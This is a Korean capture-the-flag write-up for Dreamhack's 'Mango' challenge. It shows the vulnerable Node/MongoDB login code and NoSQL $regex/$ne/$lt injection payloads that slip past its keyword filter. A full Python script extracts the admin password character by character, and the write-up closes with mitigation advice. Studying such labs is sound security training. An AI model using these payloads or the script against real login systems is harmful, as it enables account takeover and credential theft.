[Dreamhack] Level2: Mango

🛎️Access

이 문제는 데이터베이스에 저장된 플래그를 획득하는 문제이다.
flag는 admin 계정의 비밀번호이다.

플래그의 형식은 DH{…} 이다.
{‘uid’: ‘admin’, ‘upw’: ‘DH{32alphanumeric}’}

 

 

👾Exploit Algorithm & Payload

const express = require('express');
const app = express();

const mongoose = require('mongoose');
mongoose.connect('mongodb://localhost/main', { useNewUrlParser: true, useUnifiedTopology: true });
const db = mongoose.connection;

// flag is in db, {'uid': 'admin', 'upw': 'DH{32alphanumeric}'}
const BAN = ['admin', 'dh', 'admi'];

filter = function(data){
    const dump = JSON.stringify(data).toLowerCase();
    var flag = false;
    BAN.forEach(function(word){
        if(dump.indexOf(word)!=-1) flag = true;
    });
    return flag;
}

app.get('/login', function(req, res) {
    if(filter(req.query)){
        res.send('filter');
        return;
    }
    const {uid, upw} = req.query;

    db.collection('user').findOne({
        'uid': uid,
        'upw': upw,
    }, function(err, result){
        if (err){
            res.send('err');
        }else if(result){
            res.send(result['uid']);
        }else{
            res.send('undefined');
        }
    })
});

app.get('/', function(req, res) {
    res.send('/login?uid=guest&upw=guest');
});

app.listen(8000, '0.0.0.0');

 

 

#1

---

: '/' 인덱스 페이지에서 'login?uid=guest&upw=guest'라고 화면에 출력되어 있는 것을 볼 수 있다. 

: '/login' 페이지의  url에(GET) uid, upw 파라미터 값을 입력하면 결과를 확인할 수 있을 것으로 보인다.

 

 : 값을 입력하면 해당 계정의 응답 결과를 출력받을 수 있다.

(burp suite 도구를 이용하여 Request, Response 값을 확인함)

 

 

#2

---

#...
const BAN = ['admin', 'dh', 'admi'];
#...

: 해당 페이지에서 admin, dh, admi의 값은 필터링 적용된 것을 확인 할 수 있다.

 

/login?uid[$regex]=g&upw[$regex]= #guest
/login?uid[$regex]=a&upw[$regex]= #dreamhack
/login?uid[$regex]=i&upw[$regex]= #admin
/login?uid[$regex]=i&upw[$regex]= #adgj
/login?uid[$regex]=i&upw[$regex]= #mongo

/login?uid[$regex]=ad...&upw[$regex]=D.{ #admin

/login?uid[$ne]=guest&upw[$ne]=dreamhack #ad
/login?uid[$lt]=b&upw[$lt]=d #admin
...

NoSQL memo(Mongo DB 정규식 및 표현식)
$expr	쿼리 언어 내에서 집계 식을 사용할 수 있습니다.
$regex	지정된 정규식과 일치하는 문서를 선택합니다.
$text	지정된 텍스트를 검색합니다.
$where	JavaScript 표현식을 만족하는 문서와 일치합니다.
$ne	not equal (< >)
$lt	little ( < )
$gt	greater ( > )
...

: NoSQL의 Mongo DB를 injection하기 위해 위와 같은 string 쿼리 이외의 다양한 형태의 object 쿼리로 전달하여 사용자를 확인할 수 있다.

: [$regex]를 이용한 정규 표현식 임의의 값(’.’)을 넣어 문자열이 있는지 추측할 수 있다.

: 따라서 admin의 비밀번호 길이를 알아낸 후 비밀번호를 알아내야겠다고 판단하여 python으로 코드를 작성했다.

(burp suit 도구로도 가능)

 

 

#3

---

: 핵심은 다음과 같다.

- target_chars의 변수는 영어 소문자, 숫자, 특수문자를 담았다.

(영어 대문자는 코드의 .toLowerCase() 때문에 메서드의 결과가 소문자로 변환됨으로 제외시킴)

(특수 문자에서 주의할 부분이 있었다. 패스워드 내용을 확인하기 위해 주입하는 특수 문자 중 ‘.’ 이 있어서 옳은 값으로 처리되는 결과를 확인할 수 있었다. 따라서 #6에서 별도로 코드를 처리 시켰다.)

- GET방식인 params로 데이터를 요청하였다.

 

- 위에서 얻은 변수 pwd_len은(36) ‘DH{[패스워드 길이]}’ 길이다. 하지만 필터링에 dh가 있기 때문에 찼았던 값 ‘d.’을 길이에서 빼고(36-2) 반복문을 돌렸다.

- 위에서 언급했던 ‘.’을 만나게 되면 continue명령에 의해서 별도로 특수 문자 제외시켰다.

import requests
import string

url = 'http://host3.dreamhack.games:13659/login'
target_chars = string.digits + string.ascii_lowercase + '{' + '}'
flag_password = '' #End user password

pwd_len = 0 
ch = '.' #정규식 임의의 문자 표현
while(1):
    payload = f'uid[$regex]=ad...&upw[$regex]={ch}'
    #GET방식 -> params, POST방식 -> data
    response = requests.get(url, params=payload)
    if 'admin' in response.text:
        pwd_len +=1
        #print(f'len-> {response.text}:{pwd_len}')
        ch += '.'
    else:
        break
    
print(f'[*] password len: {pwd_len}')

#D. -> pwd_len - 2
for i in range(1,pwd_len+1-2):
    for c in target_chars:
        if '.' in c:
            continue
        payload = f'uid[$regex]=ad...&upw[$regex]=D.{flag_password}{c}'
        response = requests.get(url, params=payload)
        print(response.request.url)
        #admin password injection check
        #print(f'case{i}: injection->{c}')
        if 'admin' in response.text:
            flag_password += c
            #print(flag_password)
            break
        
print(f'[*] admin password: DH{flag_password}')

 

 

🔑Analysis and results for obtaining the Flag DH{…}

---

 

 

📌Summary

---

 -대응방안-

| 매개변수화된 쿼리 사용 | 
문자열 연결을 사용하여 쿼리를 작성하는 대신 프로그래밍 언어의 MongoDB 드라이버에서 제공하는 매개변수화된 쿼리 또는 준비된 명령문을 사용 (사용자 입력이 실행 가능한 코드가 아닌 값으로 처리)

| 입력 검증 및 삭제 |
사용자 입력을 쿼리에 사용하기 전에 검증하고 삭제 (예상되는 형식이나 내용을 충족하지 않는 입력을 거부)

| 화이트리스트 입력 |
사용자 입력에 대해 허용되는 값 또는 패턴의 화이트리스트를 유지 관리 (사전 정의된 기준과 일치하는 입력만 허용)
(상황에 따라서 블랙리스트 입력을 사용하기도 함)

| 특수 문자 이스케이프 | 
쿼리에 사용자 입력을 포함해야 하는 경우 특수 문자를 올바르게 이스케이프하여 MongoDB 연산자로 처리되지 않도록 함

...

 

SQL>

- 데이터 자료형: 문자열, 정수, 날짜, 실수, …

- SQL(RDBMS)

- 스키마를 정의, 해당 규격에 맞는 데이터를 2차원 테이블 형태로 저장

장) 정해진 문법을 통해 데이터를 저장하기 때문에 한 가지의 언어로 다양한 DBMS 사용

단) 저장해야 하는 데이터가 많아지면 용량의 한계가 존재

 

NoSQL>

- 데이터 자료형: 위 내용 이외에도 오브젝트, 배열 타입, …

- NoSQL(Non-Relational DBMS)

- key-value(키-값을 이용해 데이터 저장)

장) 복잡하지 않은 데이터를 저장해 단순 검색 및 추가 검색 작업을 위한 최적화된 공간

단) Redis, Dynamo, CouchDB, MongoDB 등 다양한 DBMS가 존재하기 때문에 각각의 구조와 사용 문법 익혀야 함